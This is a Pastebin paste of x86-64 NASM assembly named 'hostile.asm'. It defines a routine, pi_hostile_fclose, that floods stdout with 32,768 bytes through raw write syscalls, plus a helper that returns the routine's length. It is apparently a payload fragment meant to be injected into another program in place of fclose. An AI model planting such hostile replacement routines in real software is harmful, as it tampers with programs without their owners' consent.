Advertisement
FlyFar

hostile.asm

Jul 7th, 2023
1,932
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 1.41 KB | Cybersecurity | 0 0
  1. %define ZERO_ARGS           0x0
  2. %define WRITE_SYSCALL_NUM   0x1
  3. %define STDOUT_FILENO       0x1
  4. %define BUF_LEN             0x1
  5. %define LOOP_COUNTER        0x8000
  6. %define RANDOM_NUM          0x100
  7.  
  8. %macro do_write_syscall ZERO_ARGS
  9.     mov rdi, STDOUT_FILENO
  10.     mov rdx, BUF_LEN
  11.     mov rax, WRITE_SYSCALL_NUM
  12.     syscall  
  13. %endmacro
  14.  
  15. %macro func_ret ZERO_ARGS
  16.     xor rax, rax
  17.     ret
  18. %endmacro
  19.  
  20. %macro save_regs ZERO_ARGS
  21.     push rbx
  22.     push rdx
  23.     push rcx
  24.     push rdi
  25.     push rsi
  26.     push r8
  27.     push r9
  28.     push r10
  29. %endmacro
  30.  
  31. %macro restore_regs ZERO_ARGS
  32.     pop r10
  33.     pop r9
  34.     pop r8
  35.     pop rsi
  36.     pop rdi
  37.     pop rcx
  38.     pop rdx
  39.     pop rbx
  40. %endmacro
  41.  
  42. %macro clear_regs ZERO_ARGS
  43.     xor rax,rax
  44.     xor rbx,rbx
  45.     xor rcx,rcx
  46.     xor rdx,rdx
  47.     xor rdi,rdi
  48.     xor rsi,rsi
  49.     xor r8,r8
  50.     xor r9,r9
  51.     xor r10,r10
  52. %endmacro
  53.    
  54.    
  55. section .text
  56.  
  57. global pi_hostile_fclose, pi_get_hostile_len
  58.  
  59.  
  60. pi_hostile_fclose:
  61.  
  62.  
  63.     save_regs
  64.     clear_regs
  65.    
  66.     push RANDOM_NUM
  67.  
  68.     lea rsi, [ rsp ]    
  69.  
  70.     mov rcx, LOOP_COUNTER
  71.  
  72. loop_start:
  73.    
  74.     inc byte [ rsi ]
  75.    
  76.     push rcx
  77.    
  78.     do_write_syscall
  79.    
  80.     pop rcx
  81.    
  82.     loop loop_start
  83.  
  84. loop_end:
  85.  
  86.     pop rax
  87.     restore_regs
  88.     func_ret
  89.  
  90.  
  91. pi_hostile_fclose_end:
  92.  
  93.  
  94. pi_get_hostile_len:
  95.    
  96.     mov  rax, pi_hostile_fclose_end - pi_hostile_fclose
  97.     ret
Tags: hostile
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement